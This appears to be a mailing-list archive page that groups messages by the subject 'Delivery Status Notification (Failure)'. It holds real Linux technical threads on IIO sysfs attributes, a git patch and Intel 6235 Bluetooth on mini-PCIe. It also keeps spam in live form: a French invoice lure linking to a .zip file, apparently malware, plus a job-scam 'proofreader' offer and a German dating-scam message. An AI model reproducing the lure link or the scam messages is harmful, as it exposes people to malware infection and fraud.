        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:38:55 -0700 (PDT)
X-Received: by 10.194.85.163 with SMTP id i3mr21410208wjz.141.1434688735696;
        Thu, 18 Jun 2015 21:38:55 -0700 (PDT)
X-Received: by 10.194.85.163 with SMTP id i3mr21410201wjz.141.1434688735606;
        Thu, 18 Jun 2015 21:38:55 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id fl20si17605456wjc.185.2015.06.18.21.38.55
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:38:55 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wi0-f174.google.com (mail-wi0-f174.google.com [209.85.212.174])
	by idm.fr (Postfix) with ESMTP id 30C6D181DDB
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:38:54 +0200 (CEST)
Received: by wiga1 with SMTP id a1so7466003wig.0
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:38:54 -0700 (PDT)
X-Received: by 10.194.5.135 with SMTP id s7mr22314608wjs.115.1434688734780;
        Thu, 18 Jun 2015 21:38:54 -0700 (PDT)
X-Received: by 10.194.5.135 with SMTP id s7mr22314593wjs.115.1434688734676;
        Thu, 18 Jun 2015 21:38:54 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id gf7si7709147wjd.98.2015.06.18.21.38.54
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:38:54 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wg0-f54.google.com (mail-wg0-f54.google.com [74.125.82.54])
	by idm.fr (Postfix) with ESMTP id 50100181C5A
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:38:53 +0200 (CEST)
Received: by wgfq1 with SMTP id q1so32907992wgf.1
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:38:53 -0700 (PDT)
X-Received: by 10.180.206.33 with SMTP id ll1mr2529026wic.91.1434688733901;
        Thu, 18 Jun 2015 21:38:53 -0700 (PDT)
X-Received: by 10.180.206.33 with SMTP id ll1mr2529000wic.91.1434688733702;
        Thu, 18 Jun 2015 21:38:53 -0700 (PDT)
Received: from idm.fr ([62.160.32.11])
        by mx.google.com with ESMTP id el3si2456899wib.24.2015.06.18.21.38.53
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:38:53 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 62.160.32.11 as permitted sender) client-ip=62.160.32.11;
Received: from mail-wg0-f54.google.com (mail-wg0-f54.google.com [74.125.82.54])
	by idm.fr (Postfix) with ESMTP id 38E7C181E04
	for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Fri, 19 Jun 2015 06:38:51 +0200 (CEST)
Received: by wgbhy7 with SMTP id hy7so79590871wgb.2
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>; Thu, 18 Jun 2015 21:38:52 -0700 (PDT)
X-Received: by 10.181.11.229 with SMTP id el5mr2745914wid.40.1434688732197;
        Thu, 18 Jun 2015 21:38:52 -0700 (PDT)
X-Received: by 10.181.11.229 with SMTP id el5mr2745904wid.40.1434688732111;
        Thu, 18 Jun 2015 21:38:52 -0700 (PDT)
Received: from localhost.localdomain ([81.19.151.153])
        by mx.google.com with ESMTP id en18si17658993wjd.70.2015.06.18.21.38.51
        for <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>;
        Thu, 18 Jun 2015 21:38:51 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 81.19.151.153 as permitted sender) client-ip=81.19.151.153;
Received: from [81.19.151.153] by localhost.localdomain id 00qLgrcldNLu with SMTP; Fri, 19 Jun 2015 06:38:51 +0200
Date: Fri, 19 Jun 2015 06:38:51 +0200
From: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
X-Mailer: The Bat! (v3.6.24.9) Educational
X-Priority: 3 (Normal)
Message-ID: <19978848.81011094780544-bi+AKbBUZKY6gyzm1THtWbp2dZbC/Bob@public.gmane.org>
To: <wquest-5vFT0/cY5Q5QFI55V6+gNQ@public.gmane.org>
Subject: Re: Details facture 6009921.
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit

Bonjour, wquest

Desole pour le retard, voici une nouvelle liste de prix et de details
http://jackkunkels.nl/PosteIDFR984709264.zip?KY2Af

--
Cordialement
Il etait temps pour un peu de rien.
Tel.: 04-91-13-91-46

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
       [not found] ` <001a114904d6cd775e0511edee6f@google.com>
@ 2015-03-23  5:44   ` s.rawat
  0 siblings, 0 replies; 183+ messages in thread
From: s.rawat @ 2015-03-23  5:44 UTC (permalink / raw)
  To: kernelnewbies

More over  I also found that :
scan_elements/in_*_x_en has value = -1 instead of 0 or 1 .Could this be the
cause for this?
Thanks and Rgds,
Saurabh

On Mon, Mar 23, 2015 at 10:58 AM, Mail Delivery Subsystem <
mailer-daemon@googlemail.com> wrote:

> Delivery to the following recipient failed permanently:
>
>      linux-iio at vger.kernel.org
>
> Technical details of permanent failure:
> Google tried to deliver your message, but it was rejected by the server
> for the recipient domain vger.kernel.org by vger.kernel.org.
> [209.132.180.67].
>
> The error that the other server returned was:
> 550 5.7.1 Content-Policy reject msg: The message contains HTML subpart,
> therefore we consider it SPAM or Outlook Virus.  TEXT/PLAIN is accepted.!
> BF:<H 0.340883>; S1752369AbbCWF2O
>
>
> ----- Original message -----
>
> DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
>         d=gmail.com; s=20120113;
>         h=mime-version:from:date:message-id:subject:to:content-type;
>         bh=W+21xGol3QXRz/AvvkDAa++sfkPFzpaeG7bCHFWwCK4=;
>
> b=W24U0Vx1L94eBofJD/jfz8XA3wklJQcDDewTbOXPXQBBOJBuZQv4Q2SQ2FCVzBtcx0
>
>  bbyECGWi5OwG3CZkW/bk7Z8lHbhbkiwNAzVZk9k3/RTxPWjIQT9kxVesJckBy6dq9lr2
>
>  C/if1bV0EYyKYAuB1QPp+k+srcrfRrfawkz87nGEFu147Ocnn/ilMcBVuQLegjVZRC0Y
>
>  4AVXRtzIurvk7zOekGldYbgHGiRy+iHitSwXAtbN6pTc1bpG1dniN29ErGIq6dBcqBNI
>
>  A4RDC+9A85CEezW1rTdSz4BYvFOE5UhfeDwGfy4nRKwdw38MhBiyDmDTLb5x1KqNrK/x
>          0H7w==
> X-Received: by 10.55.22.213 with SMTP id
> 82mr135607224qkw.103.1427088493423;
>  Sun, 22 Mar 2015 22:28:13 -0700 (PDT)
> MIME-Version: 1.0
> Received: by 10.140.157.148 with HTTP; Sun, 22 Mar 2015 22:27:52 -0700
> (PDT)
> From: "s.rawat" <imsaurabhrawat@gmail.com>
> Date: Mon, 23 Mar 2015 10:57:52 +0530
> Message-ID: <CALwa49u4s7qqBUbV8FUU=
> 3dFJczEkzQwXZAEhakxGY1Xay-8iA at mail.gmail.com>
> Subject: Sysfs requirement for running generic_buffer.c application - IIO
> sensors
> To: kernelnewbies <kernelnewbies@kernelnewbies.org>,
>         "linux-iio at vger.kernel.org" <linux-iio@vger.kernel.org>
> Content-Type: multipart/alternative; boundary=001a114904d6b6b16e0511edee04
>
> I have two system having different kernel version and drivers(IIO) on which
> i can run the generic_buffer.c application .On one system it works fine but
> on the other it does not give the input reports data.
>
> I have checked that the system on which it is working has the following
> sysfs under /sys/bus/iio/devices/iio:deviceX (where X is 1,2,3...)
>
> buffer
> dev
> in_accel_hysteresis
> in_accel_offset
> in_accel_sampling_frequency
> in_accel_scale
> *in_accel_x_raw*
>
> *in_accel_y_raw*
> *in_accel_z_raw*
> name
> power
> scan_elements
> subsystem
> trigger
> uevent
>
> This is for accelerometer similiarly for magnetometer
> (in_magn_x_raw,_y_raw,z_raw etc) and for Gyrometer (
> in_anglvel_x_raw,in_anglvel_y_raw,in_anglvel_z_raw )
>
>
>
> and the one on which it is not working has the below sysfs under
> /sys/bus/iio/devices/iio:deviceX (where X is 1,2,3...) :
>
> buffer
> dev
> in_accel_hysteresis
> in_accel_offset
> in_accel_sampling_frequency
> in_accel_scale
> name
> power
> scan_elements
> subsystem
> trigger
> uevent
>
>
>
> Is the missing _x_raw,_y_raw and _z_raw component main reason for not
> working of the app,.Where I can enable them in the driver?
>
>
>
> Thanks and Rgds,
> Saurabh
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.kernelnewbies.org/pipermail/kernelnewbies/attachments/20150323/bc7a4a4c/attachment.html 

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <047d7b2ed8ab924fe60510bc0ea0@google.com>
@ 2015-03-08  0:36   ` Amate Yolande
  0 siblings, 0 replies; 183+ messages in thread
From: Amate Yolande @ 2015-03-08  0:36 UTC (permalink / raw)
  To: Junio C Hamano; +Cc: git

Hello Junio

          Thanks for the quick review and I apologize for the poorly
constructed code. I am
new to open source and git, and that was my first time coming across
the git source
code so I hoped to submit a working patch first, with the intention of
amending it later since
I did not really understand the requirements. With your clarification
and getting my self
familiar with the git commands, I hope to submit an accurate patch.

Thanks

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2015-03-01  9:46 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2015-03-01  9:46 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 226 bytes --]

The following message to <elizaveta_soloveva-7fKfrpX3floW+bLBXbPJGg@public.gmane.org> was undeliverable.
The reason for the problem:
5.3.0 - Other mail system problem 550-'5.7.1 Requested action not taken: message refused'

[-- Attachment #1.2: Type: message/delivery-status, Size: 353 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2378 bytes --]

From: "Lucilla" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <elizaveta_soloveva-7fKfrpX3floW+bLBXbPJGg@public.gmane.org>
Subject: I'll always be with you :)
Date: Sun, 01 Mar 2015 10:45:57 +0100
Message-ID: <0HhV4eXcxH4XIb0KltskJa31sxLXAXHBp@de384>


   Chi dice donna dice danno.

   Hi, elizaveta_soloveva-7fKfrpX3floW+bLBXbPJGuG/Ez6ZCGd0@public.gmane.org

   Chi fa altrui mestiere, fa la zuppa nel paniere.

   Editor/Proofreader is needed

   Val piu un cattivo accordo che una buona sentenza.

   Note: this position is for native English speakers only.

   Aiutati che il ciel t'aiuta.

   Salary up to 400/week, 1-3 hours daily.

   A rubar poco si va in galera a rubar tanto si fa carriera.

   Proofreaders check written text after it has been edited and before it
   is printed or published, providing a final quality check to make sure
   that nothing has been missed by the copy editor.

   Non sputare in cielo, che in faccia ti viene.

   In this job you will need to be accurate and pay close attention to
   detail.

   Fino alla bara sempre s'impara.

   You do not need any particular qualifications to be a proofreader.

   Male che si vuole non duole.

   You can proofread/edit at any time of the day-night that is convenient
   to you. But you need to meet deadlines.

   Primo prossimo e me medesimo.

   To be eligible to apply for this position you must have an appropriate
   Australian work visa.

   Quando non sai, frequenta il domandare.

   If you are intrested, please send you resume and phone number to
   e-mail: [1]anna.melkova-O5WfVfzUwx8@public.gmane.org

   La donna e come l'ombra: se l'insegui ti scappa, se scappi t'insegue.

   Best Regards!

   Ogni lasciata e persa.

   Zelenski CTS



   3vHK77Jo2x4ZYaChQPrZ

   Non tutte le ciambelle riescono col buco.

References

   1. mailto:anna.melkova-O5WfVfzUwx8@public.gmane.org

[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2015-02-28  4:14 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2015-02-28  4:14 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 238 bytes --]

The following message to <steveevans-xIfgLkuENgG6c6uEtOJ/EA@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'RCPT TO:<steveevans-xIfgLkuENgG6c6uEtOJ/EA@public.gmane.org> User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 358 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2234 bytes --]

From: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <steveevans-xIfgLkuENgG6c6uEtOJ/EA@public.gmane.org>
Subject: LIFE IS EXCELLENT, if there is love
Date: Sat, 28 Feb 2015 04:14:24 +0000
Message-ID: <003a01d0530d$06f2cc80$0189a8c0-GShGJHTS/rzoSVKQVDllloYESnTqepJF@public.gmane.org>

   zmQtgg05KEyCy6

   Chi perde ha sempre torto.

   Hi, steveevans-xIfgLkuENgH5c4y/nN6+SQ@public.gmane.org

   Roma non fu fatta in un giorno.

   Editor/Proofreader is needed

   Vicino alla chiesa, lontano da Dio.

   Note: this position is for native English speakers only.

   Ne donna, ne tela a lume di candela.

   Salary up to 400/week, 1-3 hours daily.

   Ognuno ha cio che merita.

   Proofreaders check written text after it has been edited and before it
   is printed or published, providing a final quality check to make sure
   that nothing has been missed by the copy editor.

   Nel dubbio astieniti.

   In this job you will need to be accurate and pay close attention to
   detail.

   E meglio essere capo di lucertola che coda di leone.

   You do not need any particular qualifications to be a proofreader.

   Passata la festa, gabbato lo santo.

   You can proofread/edit at any time of the day-night that is convenient
   to you. But you need to meet deadlines.

   Paga il giusto per il peccatore.

   To be eligible to apply for this position you must have an appropriate
   Australian work visa.

   Vanga e zappa non vuol digiuno.

   If you are intrested, please send you resume and phone number to
   e-mail: [1]anna.melkova-O5WfVfzUwx8@public.gmane.org

   A cavallo giovane, cavaliere vecchio.

   Best Regards!

   Non te fidare in omo che aggia rotto il groppone.

   Zelenski CTS



   Se non e zuppa e pan bagnato.

References

   1. mailto:anna.melkova-O5WfVfzUwx8@public.gmane.org

[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2015-01-29  6:34 Mail Delivery Subsystem
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery Subsystem @ 2015-01-29  6:34 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA

Delivery to the following recipient failed permanently:

     vgeht-OO0OHOuVXW8b1SvskN2V4Q@public.gmane.org

Technical details of permanent failure: 
Google tried to deliver your message, but it was rejected by the relay mx1.springer.com by mx1.springer.com. [192.87.127.47].

The error that the other server returned was:
550 5.1.1 <vgeht-OO0OHOuVXW8b1SvskN2V4Q@public.gmane.org>: Recipient address rejected: address does not exist in this domain


----- Original message -----

X-Gm-Message-State: ALoCoQmjVbh0yyDf55Izfd6QHn5F4DbCw17BcWA2xkRy5pdrFqTM7dfvilLYWXyK8OxlUh4Gj3rgW6WeZZVlM4rPsrkbMdcuO8piamRiFgspQa0RUmHLbJc=
X-Received: by 10.194.60.205 with SMTP id j13mr15351673wjr.42.1422513261710;
        Wed, 28 Jan 2015 22:34:21 -0800 (PST)
X-Received: by 10.194.60.205 with SMTP id j13mr15351645wjr.42.1422513261493;
        Wed, 28 Jan 2015 22:34:21 -0800 (PST)
Return-Path: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
Received: from psmtp.com (eu1sys200amx103.postini.com. [207.126.144.52])
        by mx.google.com with SMTPS id dr9si1340642wib.95.2015.01.28.22.34.20
        for <vgeht-OO0OHOuVXW8b1SvskN2V4Q@public.gmane.org>
        (version=TLSv1 cipher=RC4-SHA bits=128/128);
        Wed, 28 Jan 2015 22:34:20 -0800 (PST)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 195.234.171.34 as permitted sender) client-ip=195.234.171.34;
Authentication-Results: mx.google.com;
       spf=fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 195.234.171.34 as permitted sender) smtp.mail=containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
Received: from hosting.eurofriuli.it ([195.234.171.34]) by eu1sys200amx103.postini.com ([207.126.147.10]) with SMTP;
	Thu, 29 Jan 2015 06:34:20 GMT
Received: from [10.0.0.100] by hosting.eurofriuli.it id nxhREg0kKjQu; Thu, 29 Jan 2015 07:34:20 +0100
Message-ID: <002d01d03b8d$9af63a80$6400000a-7c6Ix4kHDaQF6GOMAaok0lp4Cf+Kod9P@public.gmane.org>
From: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <vgeht-OO0OHOuVXW8b1SvskN2V4Q@public.gmane.org>
Subject: Ich werde Sie in Ihrem Leben als MUSE UND WIE SIE LIEBEN zu begleiten!
Date: Thu, 29 Jan 2015 07:34:20 +0100
MIME-Version: 1.0
X-pstn-mail-from: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
X-pstn-dkim: 0 skipped:not-enabled
X-pstn-nxpr: disp=neutral, envrcpt=vgeht-OO0OHOuVXW8b1SvskN2V4Q@public.gmane.org
X-pstn-nxp: bodyHash=50ca37155c036cca82982399a367490e8f06b3fe, headerHash=9e8bfea5c3e4bd45ed8f28f5caa5a8e5f39cda7c, keyName=4, rcptHash=ff11434b84ecfef21ffda13bd861697e5d6c2bad, sourceip=195.234.171.34, version=1
X-Gm-Spam: 1
X-Gm-Phishy: 0
X-pstn-nxpr: disp=neutral, envrcpt=vgeht-OO0OHOuVXW8b1SvskN2V4Q@public.gmane.org
X-pstn-nxp: bodyHash=50ca37155c036cca82982399a367490e8f06b3fe, headerHash=9e8bfea5c3e4bd45ed8f28f5caa5a8e5f39cda7c, keyName=4, rcptHash=ff11434b84ecfef21ffda13bd861697e5d6c2bad, sourceip=195.234.171.34, version=1

{LINE[content]#MARK}
Content-Transfer-Encoding: 8bit


Wie geht es Ihnen? Wir treffen konnte? 

Ich mochte lernen Sie dir naher, was du daran denkst? 

Wenn du nichts dagegen haben, Dating, 
dann kannst du schreiben auf meine 
mailto:anast.zot-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org 

So kann ich senden dir mehr von meinen Fotos und uber sich selbst erzahlen. 

Ich werde deinen Brief warten.

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2015-01-15 21:13       ` Johannes Berg
@ 2015-01-16 14:30         ` Mike Purvis
  0 siblings, 0 replies; 183+ messages in thread
From: Mike Purvis @ 2015-01-16 14:30 UTC (permalink / raw)
  To: Johannes Berg; +Cc: Pat Erley, linux-wireless

Okay, captured the configuration from the working machine:

https://gist.github.com/mikepurvis/d8977be6865cebd18ff3

Looks like 8087:07da is the centrino bluetooth component, but it's not
at all obvious!

Thanks very much for the assistance.

Mike

On 15 January 2015 at 16:13, Johannes Berg <johannes@sipsolutions.net> wrote:
> On Thu, 2015-01-15 at 14:39 -0600, Pat Erley wrote:
>
>> I'd guess that the 6235 module has WLAN on the pci-e connector portion,
>> and Bluetooth on the USB portion.
>
> Yes, that's the case for all Intel wifi modules that have BT.
>
> johannes
>

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2015-01-15 20:39     ` Pat Erley
  2015-01-15 21:00       ` Mike Purvis
@ 2015-01-15 21:13       ` Johannes Berg
  2015-01-16 14:30         ` Mike Purvis
  1 sibling, 1 reply; 183+ messages in thread
From: Johannes Berg @ 2015-01-15 21:13 UTC (permalink / raw)
  To: Pat Erley; +Cc: Mike Purvis, linux-wireless

On Thu, 2015-01-15 at 14:39 -0600, Pat Erley wrote:

> I'd guess that the 6235 module has WLAN on the pci-e connector portion,
> and Bluetooth on the USB portion.

Yes, that's the case for all Intel wifi modules that have BT.

johannes


^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2015-01-15 21:00       ` Mike Purvis
@ 2015-01-15 21:07         ` Pat Erley
  0 siblings, 0 replies; 183+ messages in thread
From: Pat Erley @ 2015-01-15 21:07 UTC (permalink / raw)
  To: Mike Purvis; +Cc: linux-wireless

On 01/15/2015 03:00 PM, Mike Purvis wrote:
> Hi Pat,
>
> It's a good guess, but I don't think that's the case, in part because
> the 6235 is a 2x2 MIMO module— the antennas are MAIN/AUX, not WIFI/BT.
>
> I actually did encounter an Azurewave module which was set up that
> way, and both portions came up on the Gigabyte motherboard— I would
> have kept using that module, but there was a supply availability
> issue, the wifi performance was very poor, and I was interested in
> using a MIMO part.

Any chance you can plug the card back into the system it worked in and
catch the lspci and lsusb outputs?  I think you might be surprised.

Wifi and BT can share antennas using something called bluetooth
co-exist (bt_coex is the iwlwifi module parameter to enable/disable
it).

I did some quick googling, and there are references to the 6235 modules
requiring a USB enabled mini-pcie slot.

>
> On 15 January 2015 at 15:39, Pat Erley <pat-lkml@erley.org> wrote:
>> On 01/15/2015 01:34 PM, Mike Purvis wrote:
>>>
>>> I'm having an issue with the Centrino Advanced-N 6235 module. I'm running
>>> Ubuntu Trusty, and I've tried both the 3.13 and 3.16 kernels. Haven't yet
>>> tried 3.18.
>>>
>>> What's weirdest about it is that the module actually works with full
>>> functionality on an Advantech AIMB-274 (Q87 chipset) with the described
>>> software configuration. However, when I plug the module into either a
>>> Gigabyte
>>> J1800N or an ASRock IMB-152 (J1900), I get no bluetooth— no hci0 device
>>> comes up at all in hciconfig dev or rfkill list.
>>
>>
>> I'd guess that the 6235 module has WLAN on the pci-e connector portion,
>> and Bluetooth on the USB portion.  Check the docs on the board you're
>> plugging it into, and I bet the mini-pcie connector doesn't have the
>> USB side wired up, or it's disabled in(or by) the bios?
>>
>>>
>>> My sense is that the 6235 is a very popular module, and low-cost celeron
>>> motherboards are also pretty popular, so there must be others who have run
>>> into this. Maybe people just don't use bluetooth, or don't expect it to
>>> work on Linux?
>>>
>>> Anyhow, here is a gist with the dmesg boot log and lshw output:
>>>
>>> https://gist.github.com/mikepurvis/ee7bc8fb85ff7ae64a9d
>>>
>>> Looks like there's a crash in there related to intel integrated graphics—
>>> could this be a cause? This is a headless machine, so disabling graphics
>>> completely is on the table, if someone can suggest a good way to go
>>> about that. Any other ideas as to what's going on here?
>>>
>>> Thanks muchly.
>>>
>>>    --
>>> Mike Purvis | Clearpath Robotics, Inc.
>>> 1425 Strasburg Road, Unit 2A , Kitchener, Ontario, N2R 1H2
>>> --
>>> To unsubscribe from this list: send the line "unsubscribe linux-wireless"
>>> in
>>> the body of a message to majordomo@vger.kernel.org
>>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>>>
>>
> --
> To unsubscribe from this list: send the line "unsubscribe linux-wireless" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>


^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2015-01-15 20:39     ` Pat Erley
@ 2015-01-15 21:00       ` Mike Purvis
  2015-01-15 21:07         ` Pat Erley
  2015-01-15 21:13       ` Johannes Berg
  1 sibling, 1 reply; 183+ messages in thread
From: Mike Purvis @ 2015-01-15 21:00 UTC (permalink / raw)
  To: Pat Erley; +Cc: linux-wireless

Hi Pat,

It's a good guess, but I don't think that's the case, in part because
the 6235 is a 2x2 MIMO module— the antennas are MAIN/AUX, not WIFI/BT.

I actually did encounter an Azurewave module which was set up that
way, and both portions came up on the Gigabyte motherboard— I would
have kept using that module, but there was a supply availability
issue, the wifi performance was very poor, and I was interested in
using a MIMO part.

On 15 January 2015 at 15:39, Pat Erley <pat-lkml@erley.org> wrote:
> On 01/15/2015 01:34 PM, Mike Purvis wrote:
>>
>> I'm having an issue with the Centrino Advanced-N 6235 module. I'm running
>> Ubuntu Trusty, and I've tried both the 3.13 and 3.16 kernels. Haven't yet
>> tried 3.18.
>>
>> What's weirdest about it is that the module actually works with full
>> functionality on an Advantech AIMB-274 (Q87 chipset) with the described
>> software configuration. However, when I plug the module into either a
>> Gigabyte
>> J1800N or an ASRock IMB-152 (J1900), I get no bluetooth— no hci0 device
>> comes up at all in hciconfig dev or rfkill list.
>
>
> I'd guess that the 6235 module has WLAN on the pci-e connector portion,
> and Bluetooth on the USB portion.  Check the docs on the board you're
> plugging it into, and I bet the mini-pcie connector doesn't have the
> USB side wired up, or it's disabled in(or by) the bios?
>
>>
>> My sense is that the 6235 is a very popular module, and low-cost celeron
>> motherboards are also pretty popular, so there must be others who have run
>> into this. Maybe people just don't use bluetooth, or don't expect it to
>> work on Linux?
>>
>> Anyhow, here is a gist with the dmesg boot log and lshw output:
>>
>> https://gist.github.com/mikepurvis/ee7bc8fb85ff7ae64a9d
>>
>> Looks like there's a crash in there related to intel integrated graphics—
>> could this be a cause? This is a headless machine, so disabling graphics
>> completely is on the table, if someone can suggest a good way to go
>> about that. Any other ideas as to what's going on here?
>>
>> Thanks muchly.
>>
>>   --
>> Mike Purvis | Clearpath Robotics, Inc.
>> 1425 Strasburg Road, Unit 2A , Kitchener, Ontario, N2R 1H2
>> --
>> To unsubscribe from this list: send the line "unsubscribe linux-wireless"
>> in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>>
>

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2015-01-15 19:34   ` Mike Purvis
@ 2015-01-15 20:39     ` Pat Erley
  2015-01-15 21:00       ` Mike Purvis
  2015-01-15 21:13       ` Johannes Berg
  0 siblings, 2 replies; 183+ messages in thread
From: Pat Erley @ 2015-01-15 20:39 UTC (permalink / raw)
  To: Mike Purvis, linux-wireless

On 01/15/2015 01:34 PM, Mike Purvis wrote:
> I'm having an issue with the Centrino Advanced-N 6235 module. I'm running
> Ubuntu Trusty, and I've tried both the 3.13 and 3.16 kernels. Haven't yet
> tried 3.18.
>
> What's weirdest about it is that the module actually works with full
> functionality on an Advantech AIMB-274 (Q87 chipset) with the described
> software configuration. However, when I plug the module into either a Gigabyte
> J1800N or an ASRock IMB-152 (J1900), I get no bluetooth— no hci0 device
> comes up at all in hciconfig dev or rfkill list.

I'd guess that the 6235 module has WLAN on the pci-e connector portion,
and Bluetooth on the USB portion.  Check the docs on the board you're
plugging it into, and I bet the mini-pcie connector doesn't have the
USB side wired up, or it's disabled in(or by) the bios?

>
> My sense is that the 6235 is a very popular module, and low-cost celeron
> motherboards are also pretty popular, so there must be others who have run
> into this. Maybe people just don't use bluetooth, or don't expect it to
> work on Linux?
>
> Anyhow, here is a gist with the dmesg boot log and lshw output:
>
> https://gist.github.com/mikepurvis/ee7bc8fb85ff7ae64a9d
>
> Looks like there's a crash in there related to intel integrated graphics—
> could this be a cause? This is a headless machine, so disabling graphics
> completely is on the table, if someone can suggest a good way to go
> about that. Any other ideas as to what's going on here?
>
> Thanks muchly.
>
>   --
> Mike Purvis | Clearpath Robotics, Inc.
> 1425 Strasburg Road, Unit 2A , Kitchener, Ontario, N2R 1H2
> --
> To unsubscribe from this list: send the line "unsubscribe linux-wireless" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>


^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <f46d043c061e8dd5c9050cb5990c@google.com>
@ 2015-01-15 19:34   ` Mike Purvis
  2015-01-15 20:39     ` Pat Erley
  0 siblings, 1 reply; 183+ messages in thread
From: Mike Purvis @ 2015-01-15 19:34 UTC (permalink / raw)
  To: linux-wireless

I'm having an issue with the Centrino Advanced-N 6235 module. I'm running
Ubuntu Trusty, and I've tried both the 3.13 and 3.16 kernels. Haven't yet
tried 3.18.

What's weirdest about it is that the module actually works with full
functionality on an Advantech AIMB-274 (Q87 chipset) with the described
software configuration. However, when I plug the module into either a Gigabyte
J1800N or an ASRock IMB-152 (J1900), I get no bluetooth— no hci0 device
